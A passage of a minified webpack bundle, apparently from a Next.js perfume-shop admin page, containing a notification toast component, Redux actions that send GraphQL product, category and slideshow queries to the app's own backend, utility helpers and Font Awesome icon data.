a.a.createElement("div",{className:b()(s),style:t.style},a.a.createElement(g.a,{transitionName:this.getTransitionName()},l))}}]),e}(n.Component);O.propTypes={prefixCls:p.a.string,transitionName:p.a.string,animation:p.a.oneOfType([p.a.string,p.a.object]),style:p.a.object,maxCount:p.a.number,closeIcon:p.a.node},O.defaultProps={prefixCls:"rc-notification",animation:"fade",style:{top:65,left:"50%"}},O.newInstance=function(c,e){var t=c||{},n=t.getContainer,l=s()(t,["getContainer"]),r=document.createElement("div");n?n().appendChild(r):document.body.appendChild(r);var h=!1;L.a.render(a.a.createElement(O,i()({},l,{ref:function(c){h||(h=!0,e({notice:function(e){c.add(e)},removeNotice:function(e){c.remove(e)},component:c,destroy:function(){L.a.unmountComponentAtNode(r),r.parentNode.removeChild(r)}}))}})),r)};var T=O,x=t("CtXQ");function _(){return(_=Object.assign||function(c){for(var e=1;e<arguments.length;e++){var t=arguments[e];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(c[n]=t[n])}return c}).apply(this,arguments)}var k,I={},R=4.5,P=24,j=24,D="topRight";function F(c){var e,t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:P,n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:j;switch(c){case"topLeft":e={left:0,top:t,bottom:"auto"};break;case"topRight":e={right:0,top:t,bottom:"auto"};break;case"bottomLeft":e={left:0,top:"auto",bottom:n};break;default:e={right:0,top:"auto",bottom:n}}return e}var B={success:"check-circle-o",info:"info-circle-o",error:"close-circle-o",warning:"exclamation-circle-o"};var q={open:function(c){var e=c.prefixCls||"ant-notification",t="".concat(e,"-notice"),a=void 0===c.duration?R:c.duration,l=null;if(c.icon)l=n.createElement("span",{className:"".concat(t,"-icon")},c.icon);else if(c.type){var s=B[c.type];l=n.createElement(x.a,{className:"".concat(t,"-icon ").concat(t,"-icon-").concat(c.type),type:s})}var r=!c.description&&l?n.createElement("span",{className:"".concat(t,"-message-single-line-auto-margin")}):null;!function(c,e){var t=c.prefixCls,a=c.placement,l=void 0===a?D:a,s=c.getContainer,r=void 0===s?k:s,h=c.top,o=c.bottom,i="".concat(t,"-").concat(l);I[i]?e(I[i]):T.newInstance({prefixCls:t,className:"".concat(t,"-").concat(l),style:F(l,h,o),getContainer:r,closeIcon:n.createElement(x.a,{className:"".concat(t,"-close-icon"),type:"close"})},function(c){I[i]=c,e(c)})}({prefixCls:e,placement:c.placement,top:c.top,bottom:c.bottom,getContainer:c.getContainer},function(e){e.notice({content:n.createElement("div",{className:l?"".concat(t,"-with-icon"):""},l,n.createElement("div",{className:"".concat(t,"-message")},r,c.message),n.createElement("div",{className:"".concat(t,"-description")},c.description),c.btn?n.createElement("span",{className:"".concat(t,"-btn")},c.btn):null),duration:a,closable:!0,onClose:c.onClose,onClick:c.onClick,key:c.key,style:c.style||{},className:c.className})})},close:function(c){Object.keys(I).forEach(function(e){return I[e].removeNotice(c)})},config:function(c){var e=c.duration,t=c.placement,n=c.bottom,a=c.top,l=c.getContainer;void 0!==e&&(R=e),void 0!==t&&(D=t),void 0!==n&&(j=n),void 0!==a&&(P=a),void 0!==l&&(k=l)},destroy:function(){Object.keys(I).forEach(function(c){I[c].destroy(),delete I[c]})}};["success","info","warning","error"].forEach(function(c){q[c]=function(e){return q.open(_({},e,{type:c}))}}),q.warn=q.warning;var U=q;t("o9iy");function G(c){U.open({message:a.a.createElement("span",{className:"error-text-login"},c),icon:a.a.createElement(x.a,{type:"warning",style:{color:"#108ee9"},className:"error-icon-login"}),className:"notification-warning-toast"})}function W(c){U.open({message:a.a.createElement("span",{className:"error-text-login"},c),icon:a.a.createElement(x.a,{type:"check-circle",style:{color:"#108ee9"},className:"error-icon-login"}),className:"notification-warning-toast"})}t.d(e,"b",function(){return G}),t.d(e,"a",function(){return W})},e9Nx:function(c,e,t){(window.__NEXT_P=window.__NEXT_P||[]).push(["/admin-products",function(){var c=t("BX3z");return{page:c.default||c}}])},gBjE:function(c,e,t){"use strict";t.d(e,"a",function(){return n});var n={ZERO:0,ONE:1,TWO:2,THREE:3,FOUR:4}},jGtb:function(c,e,t){"use strict";var n=t("p46w"),a=t.n(n),l=t("S0b8"),s=(t("lTCR"),"mutation addProductCategoryQuery($name: String!, $description: String!) { addProductCategoryQuery(name: $name, description: $description) { id, name, description } }"),r="mutation addProductPerfumeQuery($name: String!, $description: String!) { addProductPerfumeQuery(name: $name, description: $description) { id, name, description } }",h="mutation addProductWeightQuery($name: String!, $value: Int!) { addProductWeightQuery(name: $name, value: $value) { id, name, value } }",o="mutation addProductQuery($title: String!, $quantity: Int!, $provider: String!, $description_title: String!, $description: String!, $image: String!, $details: String!) { \n addProductQuery(title: $title, quantity: $quantity, provider: $provider, description_title: $description_title, description: $description, image: $image, details: $details) { id, title, quantity, provider, description_title, description, image, details } }",i="mutation addSlideshowImageQuery($name: String!, $image: String!) { addSlideshowImageQuery(name: $name, image: $image) { id, name, image } }",v="query { fetchAllCategories { id, name, description } }",z="query { fetchAllWeights { id, name, value } }",m="query { fetchAllPerfumes { id, name, description } }",u="query { fetchProducts { id, title, quantity, provider, description_title, description, image, details } }",f="query { fetchSlideshowImage { id, name, image } }",d=t("oY9k"),M=t.n(d),H="http://10.188.37.107";var V=t("cOit");function p(){return function(c){M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:v})}).then(function(c){return c.json()}).then(function(c){return c}).then(function(c){return c}).then(function(e){var t;e.hasOwnProperty("errors")?(Object(V.b)("Erreur de disposition de catégories."),c({type:l.a.productCategoryFetchFailure,categories:null})):(a.a.set("product-categories",JSON.stringify(e.data.fetchAllCategories)),c((t=JSON.stringify(e.data.fetchAllCategories),{type:l.a.productCategoryFetchSuccess,categories:t})))})}}function C(){return function(c){M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:z})}).then(function(c){return c.json()}).then(function(c){return c}).then(function(c){return c}).then(function(e){var t;e.hasOwnProperty("errors")?(Object(V.b)("Erreur de disposition de poids."),c({type:l.a.productWeightFetchFailure,weights:null})):(a.a.set("product-weights",JSON.stringify(e.data.fetchAllWeights)),c((t=JSON.stringify(e.data.fetchAllWeights),{type:l.a.productWeightFetchSuccess,weights:t})))})}}function L(){return function(c){M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:m})}).then(function(c){return c.json()}).then(function(c){return c}).then(function(c){return c}).then(function(e){var t;e.hasOwnProperty("errors")?(Object(V.b)("Erreur de disposition de parfums."),c({type:l.a.productPerfumeFetchFailure,perfumes:null})):(a.a.set("product-perfumes",JSON.stringify(e.data.fetchAllPerfumes)),c((t=JSON.stringify(e.data.fetchAllPerfumes),{type:l.a.productPerfumeFetchSuccess,perfumes:t})))})}}function g(){return function(c){M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:u})}).then(function(c){return c.json()}).then(function(c){return c}).then(function(c){return c}).then(function(e){var t;e.hasOwnProperty("errors")?(Object(V.b)("Erreur de disposition de produits."),c({type:l.a.productFetchFailure,products:null})):(a.a.set("products",JSON.stringify(e.data.fetchProducts)),c((t=JSON.stringify(e.data.fetchProducts),{type:l.a.productFetchSuccess,products:t})))})}}function y(){return function(c){M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:f})}).then(function(c){return c.json()}).then(function(c){return c}).then(function(c){return c}).then(function(e){var t;e.hasOwnProperty("errors")?(Object(V.b)("Erreur de disposition d'images."),c({type:l.a.productSlideshowFetchFailure,slideshow:null})):(a.a.set("slideshow",JSON.stringify(e.data.fetchSlideshowImage)),c((t=JSON.stringify(e.data.fetchSlideshowImage),{type:l.a.productSlideshowFetchSuccess,slideshow:t})))})}}function A(c,e,t){return function(n){(function(c,e){return M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:s,variables:{name:c,description:e}})}).then(function(c){return c.json()}).then(function(c){return c})})(c,e).then(function(c){return n({type:l.a.productCategoryAddRequest,categories:null}),c}).then(function(c){var e;c.hasOwnProperty("errors")?(t(!1),Object(V.b)("Addition catégorie échoué."),n({type:l.a.productCategoryAddFailure,categories:null})):(n((e=c.data.addProductCategoryQuery,{type:l.a.productCategoryAddSuccess,categories:e})),n(p()),t(),Object(V.a)("Addition catégorie avec succès."))})}}function b(c,e,t){return function(n){(function(c,e){return M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:r,variables:{name:c,description:e}})}).then(function(c){return c.json()}).then(function(c){return c})})(c,e).then(function(c){return n({type:l.a.productPerfumeAddRequest,perfumes:null}),c}).then(function(c){var e;c.hasOwnProperty("errors")?(t(!1),Object(V.b)("Addition catégorie échoué."),n({type:l.a.productPerfumeAddFailure,perfumes:null})):(n((e=c.data.addProductPerfumeQuery,{type:l.a.productPerfumeAddSuccess,perfumes:e})),n(L()),t(),Object(V.a)("Addition parfum avec succès."))})}}function S(c,e,t){return function(n){(function(c,e){var t=parseInt(e,10);return M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:h,variables:{name:c,value:t}})}).then(function(c){return c.json()}).then(function(c){return c})})(c,e).then(function(c){return n({type:l.a.productWeightAddRequest,weights:null}),c}).then(function(c){var e;c.hasOwnProperty("errors")?(t(!1),Object(V.b)("Addition catégorie échoué."),n({type:l.a.productWeightAddFailure,weights:null})):(n((e=c.data.addProductWeightQuery,{type:l.a.productWeightAddSuccess,weights:e})),n(C()),t(),Object(V.a)("Addition poids avec succès."))})}}function w(c,e,t,n,a,s,r){return function(h){(function(c,e,t,n,a,l,s){var r=parseInt(e);return M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:o,variables:{title:c,quantity:r,provider:t,description_title:n,description:a,image:l,details:JSON.stringify(s)}})}).then(function(c){return c.json()}).then(function(c){return c})})(c,e,t,n,a,s,r).then(function(c){return h({type:l.a.productAddRequest,products:null}),c}).then(function(c){var e;c.hasOwnProperty("errors")?(Object(V.b)("Addition produit échoué."),h({type:l.a.productAddFailure,products:null})):(h((e=c.data.addProductQuery,{type:l.a.productAddSuccess,products:e})),Object(V.a)("Addition produit avec succès."))})}}function E(c,e){return function(t){(function(c,e){return M()(H+":3000/v1/graphql-second-instance/0lqY5JycFu4BwCDv7vsM",{method:"POST",headers:{"Content-Type":"application/json",Accept:"application/json"},body:JSON.stringify({query:i,variables:{name:c,image:e}})}).then(function(c){return c.json()}).then(function(c){return c})})(c,e).then(function(c){return t({type:l.a.productSlideshowAddRequest,slideshow:null}),c}).then(function(c){var e;c.hasOwnProperty("errors")?(Object(V.b)("Addition image échoué."),t({type:l.a.productSlideshowAddFailure,slideshow:null})):(t((e=c.data.addSlideshowImageQuery,{type:l.a.productSlideshowAddSuccess,slideshow:e})),t(y()),Object(V.a)("Addition image avec succès."))})}}t.d(e,"f",function(){return p}),t.d(e,"h",function(){return C}),t.d(e,"g",function(){return L}),t.d(e,"i",function(){return g}),t.d(e,"j",function(){return y}),t.d(e,"b",function(){return A}),t.d(e,"c",function(){return b}),t.d(e,"d",function(){return S}),t.d(e,"a",function(){return w}),t.d(e,"e",function(){return E})},lE2V:function(c,e,t){"use strict";t.d(e,"a",function(){return i});var n=t("mrSG"),a=t("TSYQ"),l=t.n(a),s=t("q1tI"),r=t("0Cba"),h=t("gBjE"),o=t("7x2u"),i=function(c){function e(){return null!==c&&c.apply(this,arguments)||this}return n.c(e,c),e.prototype.render=function(){var c,e=this.props,t=e.className,a=e.elevation,h=e.interactive,o=n.e(e,["className","elevation","interactive"]),i=l()(r.CARD,((c={})[r.INTERACTIVE]=h,c),r.elevationClass(a),t);return s.createElement("div",n.a({className:i},o))},e.displayName=o.a+".Card",e.defaultProps={elevation:h.a.ZERO,interactive:!1},e}(s.PureComponent)},lSzl:function(c,e,t){"use strict";function n(c,e,t){return void 0===t&&(t=function(c,e){return c===e}),null==c&&null==e||null!=c&&null!=e&&c.length===e.length&&c.every(function(c,n){return t(c,e[n])})}function a(c,e,t){if(null==c&&null==e)return!0;if(null==c||null==e)return!1;if(Array.isArray(c)||Array.isArray(e))return!1;if(null!=t)return h(c,e,t);var n=Object.keys(c),a=Object.keys(e);return h(c,e,{include:n})&&h(c,e,{include:a})}function l(c,e,t){if(c===e)return!0;if(null==c&&null==e)return!0;if(null==c||null==e)return!1;if(Array.isArray(c)||Array.isArray(e))return n(c,e,l);if(i(c)||i(e))return c===e;if(null!=t)return o(c,e,t);if(c.constructor!==e.constructor)return!1;var a=Object.keys(c),s=Object.keys(e);return null!=a&&null!=s&&(0===a.length&&0===s.length||n(a,s)&&o(c,e,a))}function s(c,e,t){var n=null==c?{}:c,l=null==e?{}:e;return m(n,l,v(n,l,null==t?{exclude:[]}:t),function(c,e,t){return a(c,e,{include:[t]})})}function r(c,e,t){return void 0===c&&(c={}),void 0===e&&(e={}),m(c,e,null==t?function(c,e){var t=Object.keys(c),n=Object.keys(e),a=z(t.concat(n));return Object.keys(a)}(c,e):t,function(c,e,t){return l(c,e,[t])})}function h(c,e,t){return v(c,e,t).every(function(t){return c.hasOwnProperty(t)===e.hasOwnProperty(t)&&c[t]===e[t]})}function o(c,e,t){return t.every(function(t){return c.hasOwnProperty(t)===e.hasOwnProperty(t)&&l(c[t],e[t])})}function i(c){return"number"==typeof c||"string"==typeof c||"boolean"==typeof c}function v(c,e,t){if(function(c){return null!=c&&null!=c.include}(t))return t.include;var n=Object.keys(c),a=Object.keys(e),l=z(n.concat(a));return t.exclude.forEach(function(c){return delete l[c]}),Object.keys(l)}function z(c){return c.reduce(function(c,e){return c[e]=!0,c},{})}function m(c,e,t,n){return t.filter(function(t){return!n(c,e,t)}).map(function(t){return{key:t,valueA:c[t],valueB:e[t]}})}t.d(e,"a",function(){return n}),t.d(e,"e",function(){return a}),t.d(e,"b",function(){return l}),t.d(e,"d",function(){return s}),t.d(e,"c",function(){return r})},mrSG:function(c,e,t){"use strict";t.d(e,"c",function(){return a}),t.d(e,"a",function(){return l}),t.d(e,"e",function(){return s}),t.d(e,"b",function(){return r}),t.d(e,"d",function(){return h});var n=function(c,e){return(n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(c,e){c.__proto__=e}||function(c,e){for(var t in e)e.hasOwnProperty(t)&&(c[t]=e[t])})(c,e)};function a(c,e){function t(){this.constructor=c}n(c,e),c.prototype=null===e?Object.create(e):(t.prototype=e.prototype,new t)}var l=function(){return(l=Object.assign||function(c){for(var e,t=1,n=arguments.length;t<n;t++)for(var a in e=arguments[t])Object.prototype.hasOwnProperty.call(e,a)&&(c[a]=e[a]);return c}).apply(this,arguments)};function s(c,e){var t={};for(var n in c)Object.prototype.hasOwnProperty.call(c,n)&&e.indexOf(n)<0&&(t[n]=c[n]);if(null!=c&&"function"==typeof Object.getOwnPropertySymbols){var a=0;for(n=Object.getOwnPropertySymbols(c);a<n.length;a++)e.indexOf(n[a])<0&&(t[n[a]]=c[n[a]])}return t}function r(c,e,t,n){return new(t||(t=Promise))(function(a,l){function s(c){try{h(n.next(c))}catch(e){l(e)}}function r(c){try{h(n.throw(c))}catch(e){l(e)}}function h(c){c.done?a(c.value):new t(function(e){e(c.value)}).then(s,r)}h((n=n.apply(c,e||[])).next())})}function h(c,e){var t,n,a,l,s={label:0,sent:function(){if(1&a[0])throw a[1];return a[1]},trys:[],ops:[]};return l={next:r(0),throw:r(1),return:r(2)},"function"==typeof Symbol&&(l[Symbol.iterator]=function(){return this}),l;function r(l){return function(r){return function(l){if(t)throw new TypeError("Generator is already executing.");for(;s;)try{if(t=1,n&&(a=2&l[0]?n.return:l[0]?n.throw||((a=n.return)&&a.call(n),0):n.next)&&!(a=a.call(n,l[1])).done)return a;switch(n=0,a&&(l=[2&l[0],a.value]),l[0]){case 0:case 1:a=l;break;case 4:return s.label++,{value:l[1],done:!1};case 5:s.label++,n=l[1],l=[0];continue;case 7:l=s.ops.pop(),s.trys.pop();continue;default:if(!(a=(a=s.trys).length>0&&a[a.length-1])&&(6===l[0]||2===l[0])){s=0;continue}if(3===l[0]&&(!a||l[1]>a[0]&&l[1]<a[3])){s.label=l[1];break}if(6===l[0]&&s.label<a[1]){s.label=a[1],a=l;break}if(a&&s.label<a[2]){s.label=a[2],s.ops.push(l);break}a[2]&&s.ops.pop(),s.trys.pop();continue}l=e.call(c,s)}catch(r){l=[6,r],n=0}finally{t=a=0}if(5&l[0])throw l[1];return{value:l[0]?l[1]:void 0,done:!0}}([l,r])}}}},"twK/":function(c,e,t){"use strict";t.d(e,"b",function(){return a}),t.d(e,"a",function(){return n});var n={prefix:"far",iconName:"paper-plane",icon:[512,512,[],"f1d8","M440 6.5L24 246.4c-34.4 19.9-31.1 70.8 5.7 85.9L144 379.6V464c0 46.4 59.2 65.5 86.6 28.6l43.8-59.1 111.9 46.2c5.9 2.4 12.1 3.6 18.3 3.6 8.2 0 16.3-2.1 23.6-6.2 12.8-7.2 21.6-20 23.9-34.5l59.4-387.2c6.1-40.1-36.9-68.8-71.5-48.9zM192 464v-64.6l36.6 15.1L192 464zm212.6-28.7l-153.8-63.5L391 169.5c10.7-15.5-9.5-33.5-23.7-21.2L155.8 332.6 48 288 464 48l-59.4 387.3z"]},a={faAddressBook:{prefix:"far",iconName:"address-book",icon:[448,512,[],"f2b9","M436 160c6.6 0 12-5.4 12-12v-40c0-6.6-5.4-12-12-12h-20V48c0-26.5-21.5-48-48-48H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h320c26.5 0 48-21.5 48-48v-48h20c6.6 0 12-5.4 12-12v-40c0-6.6-5.4-12-12-12h-20v-64h20c6.6 0 12-5.4 12-12v-40c0-6.6-5.4-12-12-12h-20v-64h20zm-68 304H48V48h320v416zM208 256c35.3 0 64-28.7 64-64s-28.7-64-64-64-64 28.7-64 64 28.7 64 64 64zm-89.6 128h179.2c12.4 0 22.4-8.6 22.4-19.2v-19.2c0-31.8-30.1-57.6-67.2-57.6-10.8 0-18.7 8-44.8 8-26.9 0-33.4-8-44.8-8-37.1 0-67.2 25.8-67.2 57.6v19.2c0 10.6 10 19.2 22.4 19.2z"]},faAddressCard:{prefix:"far",iconName:"address-card",icon:[576,512,[],"f2bb","M528 32H48C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48 48h480c26.5 0 48-21.5 48-48V80c0-26.5-21.5-48-48-48zm0 400H48V80h480v352zM208 256c35.3 0 64-28.7 64-64s-28.7-64-64-64-64 28.7-64 64 28.7 64 64 64zm-89.6 128h179.2c12.4 0 22.4-8.6 22.4-19.2v-19.2c0-31.8-30.1-57.6-67.2-57.6-10.8 0-18.7 8-44.8 8-26.9 0-33.4-8-44.8-8-37.1 0-67.2 25.8-67.2 57.6v19.2c0 10.6 10 19.2 22.4 19.2zM360 320h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8zm0-64h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8zm0-64h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8z"]},faAngry:{prefix:"far",iconName:"angry",icon:[496,512,[],"f556","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm0-144c-33.6 0-65.2 14.8-86.8 40.6-8.5 10.2-7.1 25.3 3.1 33.8s25.3 7.2 33.8-3c24.8-29.7 75-29.7 99.8 0 8.1 9.7 23.2 11.9 33.8 3 10.2-8.5 11.5-23.6 3.1-33.8-21.6-25.8-53.2-40.6-86.8-40.6zm-48-72c10.3 0 19.9-6.7 23-17.1 3.8-12.7-3.4-26.1-16.1-29.9l-80-24c-12.8-3.9-26.1 3.4-29.9 16.1-3.8 12.7 3.4 26.1 16.1 29.9l28.2 8.5c-3.1 4.9-5.3 10.4-5.3 16.6 0 17.7 14.3 32 32 32s32-14.4 32-32.1zm199-54.9c-3.8-12.7-17.1-19.9-29.9-16.1l-80 24c-12.7 3.8-19.9 17.2-16.1 29.9 3.1 10.4 12.7 17.1 23 17.1 0 17.7 14.3 32 32 32s32-14.3 32-32c0-6.2-2.2-11.7-5.3-16.6l28.2-8.5c12.7-3.7 19.9-17.1 16.1-29.8z"]},faArrowAltCircleDown:{prefix:"far",iconName:"arrow-alt-circle-down",icon:[512,512,[],"f358","M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm-32-316v116h-67c-10.7 0-16 12.9-8.5 20.5l99 99c4.7 4.7 12.3 4.7 17 0l99-99c7.6-7.6 2.2-20.5-8.5-20.5h-67V140c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12z"]},faArrowAltCircleLeft:{prefix:"far",iconName:"arrow-alt-circle-left",icon:[512,512,[],"f359","M8 256c0 137 111 248 248 248s248-111 248-248S393 8 256 8 8 119 8 256zm448 0c0 110.5-89.5 200-200 200S56 366.5 56 256 145.5 56 256 56s200 89.5 200 200zm-72-20v40c0 6.6-5.4 12-12 12H256v67c0 10.7-12.9 16-20.5 8.5l-99-99c-4.7-4.7-4.7-12.3 0-17l99-99c7.6-7.6 20.5-2.2 20.5 8.5v67h116c6.6 0 12 5.4 12 12z"]},faArrowAltCircleRight:{prefix:"far",iconName:"arrow-alt-circle-right",icon:[512,512,[],"f35a","M504 256C504 119 393 8 256 8S8 119 8 256s111 248 248 248 248-111 248-248zm-448 0c0-110.5 89.5-200 200-200s200 89.5 200 200-89.5 200-200 200S56 366.5 56 256zm72 20v-40c0-6.6 5.4-12 12-12h116v-67c0-10.7 12.9-16 20.5-8.5l99 99c4.7 4.7 4.7 12.3 0 17l-99 99c-7.6 7.6-20.5 2.2-20.5-8.5v-67H140c-6.6 0-12-5.4-12-12z"]},faArrowAltCircleUp:{prefix:"far",iconName:"arrow-alt-circle-up",icon:[512,512,[],"f35b","M256 504c137 0 248-111 248-248S393 8 256 8 8 119 8 256s111 248 248 248zm0-448c110.5 0 200 89.5 200 200s-89.5 200-200 200S56 366.5 56 256 145.5 56 256 56zm20 328h-40c-6.6 0-12-5.4-12-12V256h-67c-10.7 0-16-12.9-8.5-20.5l99-99c4.7-4.7 12.3-4.7 17 0l99 99c7.6 7.6 2.2 20.5-8.5 20.5h-67v116c0 6.6-5.4 12-12 12z"]},faBell:{prefix:"far",iconName:"bell",icon:[448,512,[],"f0f3","M439.39 362.29c-19.32-20.76-55.47-51.99-55.47-154.29 0-77.7-54.48-139.9-127.94-155.16V32c0-17.67-14.32-32-31.98-32s-31.98 14.33-31.98 32v20.84C118.56 68.1 64.08 130.3 64.08 208c0 102.3-36.15 133.53-55.47 154.29-6 6.45-8.66 14.16-8.61 21.71.11 16.4 12.98 32 32.1 32h383.8c19.12 0 32-15.6 32.1-32 .05-7.55-2.61-15.27-8.61-21.71zM67.53 368c21.22-27.97 44.42-74.33 44.53-159.42 0-.2-.06-.38-.06-.58 0-61.86 50.14-112 112-112s112 50.14 112 112c0 .2-.06.38-.06.58.11 85.1 23.31 131.46 44.53 159.42H67.53zM224 512c35.32 0 63.97-28.65 63.97-64H160.03c0 35.35 28.65 64 63.97 64z"]},faBellSlash:{prefix:"far",iconName:"bell-slash",icon:[640,512,[],"f1f6","M633.99 471.02L36 3.51C29.1-2.01 19.03-.9 13.51 6l-10 12.49C-2.02 25.39-.9 35.46 6 40.98l598 467.51c6.9 5.52 16.96 4.4 22.49-2.49l10-12.49c5.52-6.9 4.41-16.97-2.5-22.49zM163.53 368c16.71-22.03 34.48-55.8 41.4-110.58l-45.47-35.55c-3.27 90.73-36.47 120.68-54.84 140.42-6 6.45-8.66 14.16-8.61 21.71.11 16.4 12.98 32 32.1 32h279.66l-61.4-48H163.53zM320 96c61.86 0 112 50.14 112 112 0 .2-.06.38-.06.58.02 16.84 1.16 31.77 2.79 45.73l59.53 46.54c-8.31-22.13-14.34-51.49-14.34-92.85 0-77.7-54.48-139.9-127.94-155.16V32c0-17.67-14.32-32-31.98-32s-31.98 14.33-31.98 32v20.84c-26.02 5.41-49.45 16.94-69.13 32.72l38.17 29.84C275 103.18 296.65 96 320 96zm0 416c35.32 0 63.97-28.65 63.97-64H256.03c0 35.35 28.65 64 63.97 64z"]},faBookmark:{prefix:"far",iconName:"bookmark",icon:[384,512,[],"f02e","M336 0H48C21.49 0 0 21.49 0 48v464l192-112 192 112V48c0-26.51-21.49-48-48-48zm0 428.43l-144-84-144 84V54a6 6 0 0 1 6-6h276c3.314 0 6 2.683 6 5.996V428.43z"]},faBuilding:{prefix:"far",iconName:"building",icon:[448,512,[],"f1ad","M128 148v-40c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v40c0 6.6-5.4 12-12 12h-40c-6.6 0-12-5.4-12-12zm140 12h40c6.6 0 12-5.4 12-12v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12zm-128 96h40c6.6 0 12-5.4 12-12v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12zm128 0h40c6.6 0 12-5.4 12-12v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12zm-76 84v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm76 12h40c6.6 0 12-5.4 12-12v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12zm180 124v36H0v-36c0-6.6 5.4-12 12-12h19.5V24c0-13.3 10.7-24 24-24h337c13.3 0 24 10.7 24 24v440H436c6.6 0 12 5.4 12 12zM79.5 463H192v-67c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v67h112.5V49L80 48l-.5 415z"]},faCalendar:{prefix:"far",iconName:"calendar",icon:[448,512,[],"f133","M400 64h-48V12c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v52H160V12c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v52H48C21.5 64 0 85.5 0 112v352c0 26.5 21.5 48 48 48h352c26.5 0 48-21.5 48-48V112c0-26.5-21.5-48-48-48zm-6 400H54c-3.3 0-6-2.7-6-6V160h352v298c0 3.3-2.7 6-6 6z"]},faCalendarAlt:{prefix:"far",iconName:"calendar-alt",icon:[448,512,[],"f073","M148 288h-40c-6.6 0-12-5.4-12-12v-40c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v40c0 6.6-5.4 12-12 12zm108-12v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm96 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm-96 96v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm-96 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm192 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm96-260v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V112c0-26.5 21.5-48 48-48h48V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h128V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h48c26.5 0 48 21.5 48 48zm-48 346V160H48v298c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faCalendarCheck:{prefix:"far",iconName:"calendar-check",icon:[448,512,[],"f274","M400 64h-48V12c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v52H160V12c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v52H48C21.49 64 0 85.49 0 112v352c0 26.51 21.49 48 48 48h352c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm-6 400H54a6 6 0 0 1-6-6V160h352v298a6 6 0 0 1-6 6zm-52.849-200.65L198.842 404.519c-4.705 4.667-12.303 4.637-16.971-.068l-75.091-75.699c-4.667-4.705-4.637-12.303.068-16.971l22.719-22.536c4.705-4.667 12.303-4.637 16.97.069l44.104 44.461 111.072-110.181c4.705-4.667 12.303-4.637 16.971.068l22.536 22.718c4.667 4.705 4.636 12.303-.069 